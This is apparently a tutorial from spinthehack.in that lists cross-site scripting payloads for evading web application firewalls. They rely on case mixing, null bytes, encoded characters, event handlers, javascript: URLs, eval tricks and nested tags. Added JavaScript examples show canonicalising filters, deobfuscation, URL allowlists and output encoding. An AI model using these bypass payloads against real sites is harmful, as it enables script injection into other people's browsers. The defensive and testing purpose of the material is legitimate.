
XSS WAF Bypass Trick

www.spinthehack.in

Watch here

▪ Basic Modification

<script>alert(1)</script>

This is our normal payload. If the WAF is blocking the <script>, alert or </script> tokens, try the following variants.

<script >alert(1)</script>
<script >alert(1)</script>
Try giving random whitespace inside the tag to bypass the WAF.

<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
Try giving random HTML-encoded values between the script tags.

<ScRipT>alert(1)</sCriPt>
Try mixing lowercase and uppercase letters.

<%00script>alert(1)</script>
<script>al%00ert(1)</script>
Add %00 to bypass a restriction on the alert word.

▪ Attributes and Tags

<input type="text" name="input" value="hello">

Start from this normal input tag. The payloads below fool the website because they contain "> (a closing quote and bracket): the parser treats the value as already finished, and whatever follows is read as new markup.

<input type="text" name="input" value="><script>alert(1)</script>
Try writing XSS test code as the value.

<randomtag type="text" name="input" value="><script>alert(1)</script>
Try writing any random tag at the start.

<iNpUt type="text" name="input" value="><script>alert(1)</script>
Changing lowercase and uppercase can also work.

<input/'type="text" name="input" value="><script>alert(1)</script>
Try replacing the space, or writing any HTML values, between the tag name and its attributes.

<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>
Try replacing the space, or writing any HTML-encoded values, between the tag name and its attributes.

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
Try inserting a null byte (%00) at different positions.

<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>
The null byte can work on attribute names and values too.

▪ Event Handlers

<input onsubmit=alert(1)>

Think of a button the user is going to click on the page: with a little JavaScript attached to it, the click (an event) runs our code.

<object onerror=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<script onreadystatechange=alert(1)>
<input autofocus onfocus=alert(1)>
</a onfocus=alert(1)>
Try these alternatives instead of onsubmit (if it doesn't work).

<audio src="new.mp3" onerror=alert(1)>
<video src="new.mp4" onerror=alert(1)>
<svg width="200" height="100" onload=alert(1)>
These alternatives can also be used if the HTML used on the page is HTML5.

▪ Delimiters & Brackets

A delimiter is one or more characters used to separate text.

<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
Try using single and double quotes.

<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>
Try using encoded values to bypass.

<img onerror=`alert(1)`src=x>
Try using a backtick (grave accent).

<img onerror=&#96alert(1)&#96src=x>
The encoded value can be used in between as well.

<img src=`x`onerror=alert(1)>
Try using ` (grave accent) around the attribute value.

Just like delimiters, brackets can also help to bypass website or page filters.

<<script>alert(1)//<</script>
By using extra brackets the system can be tricked, and the double slash comments out the extra bracket before the closing tag.

<input onsubmit=alert(1)<
An open bracket at the end could also help to bypass.

«input onsubmit=alert(1)»
Try using different brackets.

&#174input onsubmit=alert(1)&#175
Try using different characters.
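The variants in the sections above all exploit one weakness: a filter that matches literal strings before the input has been normalised the way a browser will normalise it. The JavaScript below is an added example written for this page (it is not code from the slides or from spinthehack.in): a naive blocklist beside one that canonicalises first, both run over the slides' own payloads. The sample strings, the rule regexes and the function names are constructed for the demonstration.

```javascript
// Added example, not from the original slides: a naive blocklist next to one
// that canonicalises its input first, run over the slide's own payloads.
// Detection logic only; the sample strings below are constructed for the demo.

// Naive WAF rule: literal, case-sensitive substring and regex checks.
function naiveBlocklist(input) {
  return input.includes("<script>") || /\son\w+="/.test(input);
}

// Turn a numeric character reference into text; ignore out-of-range values.
const cp = n => (n > 0 && n <= 0x10ffff) ? String.fromCodePoint(n) : "";

// Normalise the way a browser will before the markup is interpreted:
//  1. percent-decode (%00 -> NUL, %3C -> '<', ...), keeping the raw text if
//     the encoding is malformed
//  2. drop NUL bytes, which the HTML tokenizer does not keep in names
//  3. decode numeric character references, with or without the trailing ';'
//  4. fold case, since tag and attribute names are case-insensitive
//  5. collapse runs of whitespace (tab, LF, CR, space) to a single space
function canonicalize(input) {
  let s = input;
  try { s = decodeURIComponent(s); } catch (e) { /* keep raw on bad %xx */ }
  s = s.replace(/\0/g, "");
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
  s = s.toLowerCase();
  s = s.replace(/[\t\n\r ]+/g, " ");
  return s;
}

// Rules applied to the canonical form: a script tag (any amount of whitespace
// between '<' and the name), or any tag carrying an on* attribute, whatever
// character separates it from the previous token (space, slash, quote, backtick).
const SCRIPT_TAG = /<\s*script\b/;
const EVENT_HANDLER = /<[a-z][^>]*[\s/"'`]on[a-z]+\s*=/;

function canonicalBlocklist(input) {
  const c = canonicalize(input);
  return SCRIPT_TAG.test(c) || EVENT_HANDLER.test(c);
}

// Constructed samples: seven of the slide's payloads plus one benign input.
const SAMPLES = [
  "<ScRipT>alert(1)</sCriPt>",
  "<script&#9>alert(1)</script>",
  "<%00script>alert(1)</script>",
  "<img onerror='alert(1)'src=x>",
  "<img onerror=&#34alert(1)&#34src=x>",
  "<img src=`x`onerror=alert(1)>",
  "<input onsubmit=alert(1)<",
  '<input type="text" name="input" value="hello">',
];

// Side-by-side verdicts for each sample, returned so they can be checked.
function report(samples = SAMPLES) {
  return samples.map(s => ({
    payload: s,
    naive: naiveBlocklist(s),
    canonical: canonicalBlocklist(s),
  }));
}

console.table(report());
```

canonicalize() is what a detection rule should see; naiveBlocklist() is what many hand-written rules actually see, and it flags none of the seven payloads. Even the canonicalised rule is coarse (an ordinary attribute named one= would trip EVENT_HANDLER), which is why the durable fix is not a longer blocklist but encoding output for the context it lands in and restricting script execution with a Content Security Policy.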

▪ Pseudo Protocols

<a href="https://www.google.com">Click Here</a>
This is a hyperlink: the user goes from one page to another with a single click.

<a href="javascript:alert(1)">Click Here</a>
Try injecting code through the javascript: pseudo-protocol to check for XSS.

<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
<object data=javascript:alert(1)>
<button formaction=javascript:alert(1)>
<video src=javascript:alert(1)>
Other attributes that take a URL as a value can also be used.

▪ Existing JavaScript & Character Escaping

<script>var a = 'myteststring; ... </script>
Try defining a variable and injecting a payload into it.

'; alert(1); //
The script still works and the system won't filter it, because of the double slash.

<script>var a = '\\'; alert(1); //
Escaping characters can also be helpful.

<script>a\u006cert(1)</script>
Using Unicode characters like this can help.

▪ Dynamic String Construction & Eval()

JavaScript contains a function called eval().

eval('1 + 1')
This function call evaluates to 2.

<script>eval('a\u006cert(1)')</script>
We can use Unicode encoding inside the string passed to eval('...').

<script>eval('al' + 'ert(1)')</script>
If the function name is blocked, building it from its actual characters can work.

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
Another function, String.fromCharCode(), can be used together with eval() to build the string from character codes.
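For the Unicode escapes, string concatenation and String.fromCharCode() shown in this section and the previous one, a rule that matches the literal word alert sees nothing. The JavaScript below is an added example (not from the slides): a deobfuscation pass for log review or WAF-rule testing that folds those three encodings back into plain text, followed by the encoder that belongs on the output side when untrusted data is written into a JavaScript string literal such as var a = '...'. Function names and sample strings are constructed for this example.

```javascript
// Added example, not from the original slides. Detection-side decoding of
// the three obfuscations on this page, plus the output-side encoder for the
// JS-string context. Heuristics for review tooling; the controls that stop
// this class of payload are output encoding and a Content Security Policy
// without 'unsafe-eval' / 'unsafe-inline'.

function decodeUnicodeEscapes(s) {
  // \u{6c}, \u006c and \x6c all become 'l'; malformed escapes are left as-is
  return s
    .replace(/\\u\{([0-9a-f]+)\}/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function joinStringConcat(s) {
  // 'al' + 'ert'  ->  'alert'  (same quote style on both sides of the '+').
  // Repeat until stable so chains of three or more pieces collapse too.
  const re = /(['"])\s*\+\s*\1/g;
  let prev;
  do { prev = s; s = s.replace(re, ""); } while (s !== prev);
  return s;
}

function inlineFromCharCode(s) {
  // String.fromCharCode(97, 108, ...) -> 'alert'
  return s.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, list) => {
    const codes = list.split(",").map(n => parseInt(n.trim(), 10)).filter(n => !isNaN(n));
    return "'" + String.fromCharCode(...codes) + "'";
  });
}

function deobfuscate(s) {
  return inlineFromCharCode(joinStringConcat(decodeUnicodeEscapes(s)));
}

// Only after decoding is a simple pattern meaningful.
function mentionsAlert(s) {
  return /\balert\s*\(/.test(deobfuscate(s));
}

// Output-side fix for the var a = '<untrusted>' case: every character other
// than ASCII letters, digits and space becomes a \uXXXX escape, so a quote,
// semicolon, backslash or slash is data inside the literal and can neither
// end it nor open a // comment.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g,
    c => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Constructed samples: the page's payloads and one benign line.
const SAMPLES = [
  "<script>a\\u006cert(1)</script>",
  "<script>eval('a\\u006cert(1)')</script>",
  "<script>eval('al' + 'ert(1)')</script>",
  "<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>",
  "var total = count + 1;",
];

for (const s of SAMPLES) console.log(mentionsAlert(s), deobfuscate(s));
console.log("var a = '" + encodeForJsString("'; alert(1); //") + "';");
```

The deobfuscation helpers are deliberately narrow: they undo exactly the encodings on these slides and nothing more, which is enough to show why matching before decoding is pointless. encodeForJsString() is the other half: with the value escaped this way the injected '; alert(1); // stays inside the string literal the application intended.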

▪ Meta Refresh & File Renaming

A web browser can automatically refresh the current page after a certain period.

<meta http-equiv="refresh" content="0;url=javascript:alert(1);">

<script src="payload.jpg">
Try renaming the script source to an image file.
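The javascript: URLs in the Pseudo Protocols section and the meta refresh target above are the same problem on the validation side: a URL-valued attribute is filled from untrusted input. The JavaScript below is an added example (not from the slides) of an allowlist check that parses the value the way a browser does instead of searching for the string "javascript:". Node's URL class implements the WHATWG URL parser, which trims leading and trailing control characters and spaces and removes tabs and newlines before reading the scheme. The base origin https://example.test/, the allowlist and the function names are constructed for this example.

```javascript
// Added example, not from the original slides: scheme allowlist for
// attacker-controlled URL attributes (href, src, action, formaction, data)
// and for the url= part of a meta refresh. Constructed placeholder origin.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const BASE = "https://example.test/";

function isSafeUrl(value) {
  let url;
  try {
    url = new URL(value, BASE);   // relative values resolve against BASE
  } catch (e) {
    return false;                 // unparsable: reject rather than guess
  }
  // url.protocol is already lower-cased and has whitespace/controls removed
  return ALLOWED_SCHEMES.has(url.protocol);
}

// <meta http-equiv="refresh" content="0;url=..."> carries its target inside
// the content attribute. Pull it out so the same allowlist applies.
function refreshTarget(content) {
  const semi = content.indexOf(";");
  if (semi < 0) return null;                        // a bare delay has no URL
  let rest = content.slice(semi + 1).trim();
  rest = rest.replace(/^url\s*=\s*/i, "");          // optional "url=" prefix
  return rest.replace(/^['"]|['"]$/g, "").trim();   // optional quotes
}

function isSafeRefresh(content) {
  const target = refreshTarget(content);
  return target === null ? true : isSafeUrl(target);
}

// Constructed samples: the slide's values plus benign and whitespace variants.
const URL_SAMPLES = [
  "https://www.google.com",
  "/relative/path",
  "javascript:alert(1)",
  " JaVaScRiPt:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,x",
];
for (const v of URL_SAMPLES) console.log(isSafeUrl(v), JSON.stringify(v));
console.log(isSafeRefresh("0;url=javascript:alert(1);"), isSafeRefresh("5"));
```

For the <script src="payload.jpg"> trick the relevant server-side control is the response header X-Content-Type-Options: nosniff: with it set, browsers refuse to execute a script whose response does not carry a JavaScript MIME type, so the file's extension stops mattering.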

▪ Sanitization & Length Limits

<script><script>alert(1)</script>
Try adding multiple tags (sometimes the application removes only the first instance of the script tag).

<sc<script>ript>alert(1)</script>
Any tag can be placed inside so that the first instance gets filtered by the application and the rest reassembles.

If the payload is being rejected because of a length limit, then:

<input type="hidden" name="id" value=""><script>/*">
<input type="hidden" name="checksum" value="*/alert(1)/*">
<input type="hidden" name="status" value="*/</script>">
Everything between /* and */ is ignored, so the browser ultimately processes our payload as if it had been injected in only one location.
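The nested-tag payloads above defeat a sanitizer that removes <script> in a single pass, and the three hidden fields work because the application's only defence was the length limit, not what it wrote back into the attribute. The JavaScript below is an added example (not from the slides) contrasting first-instance, single-pass and fixed-point stripping on those payloads, then the attribute-context encoder that makes stripping unnecessary; hiddenInput() is a constructed stand-in for however the page renders its fields.

```javascript
// Added example, not from the original slides: three strip strategies against
// the nested payloads, and the encoder that should replace stripping.
// Samples are the slide's payloads as constructed strings.

const SCRIPT_TAGS = /<\/?script\b[^>]*>/gi;

// Removes only the first <script ...> tag, which is the behaviour the slide
// describes for some applications.
function stripFirstScriptTag(html) {
  return html.replace(/<script\b[^>]*>/i, "");
}

// One pass over the input: every <script>/</script> found is removed, but the
// characters around a removed tag become adjacent and may form a new tag.
function stripScriptOnce(html) {
  return html.replace(SCRIPT_TAGS, "");
}

// Repeat until nothing changes, so tags reassembled by a previous pass are
// removed as well.
function stripScriptFixpoint(html) {
  let prev;
  do { prev = html; html = html.replace(SCRIPT_TAGS, ""); } while (html !== prev);
  return html;
}

// Encoding for the HTML attribute context: the five characters that can end
// or alter an attribute value become entities. The payload survives verbatim
// as data, so there is nothing for the browser to reassemble and the
// /* ... */ trick across fields has nothing to join.
function encodeForHtmlAttribute(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function hiddenInput(name, value) {
  return '<input type="hidden" name="' + encodeForHtmlAttribute(name) +
         '" value="' + encodeForHtmlAttribute(value) + '">';
}

// Constructed samples from the slide.
const NESTED = "<sc<script>ript>alert(1)</script>";
const DOUBLED = "<script><script>alert(1)</script>";
console.log("first only :", stripFirstScriptTag(DOUBLED));
console.log("single pass:", stripScriptOnce(NESTED));
console.log("fixed point:", stripScriptFixpoint(NESTED));
console.log(hiddenInput("id", '"><script>/*'));
console.log(hiddenInput("checksum", "*/alert(1)/*"));
console.log(hiddenInput("status", "*/</script>"));
```

Note what the fixed-point strip still does not give you: it destroys the data, so a legitimate value containing the text "<script>" is silently altered, and it knows nothing about the dozens of other tags and on* attributes on the earlier slides. Encoding for the context keeps the data intact and needs no list of bad tags.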

▪ Advanced Filter Evasion Techniques

<script>alert(1)</script>

Imagine that for this payload you are not allowed to use </script>, the closing tag. What will you do now?

Don't worry, there is a solution: the official OWASP website has a list of many more tricks to bypass WAFs.

Visit this link: XSS Filter Evasion Cheat Sheet | OWASP
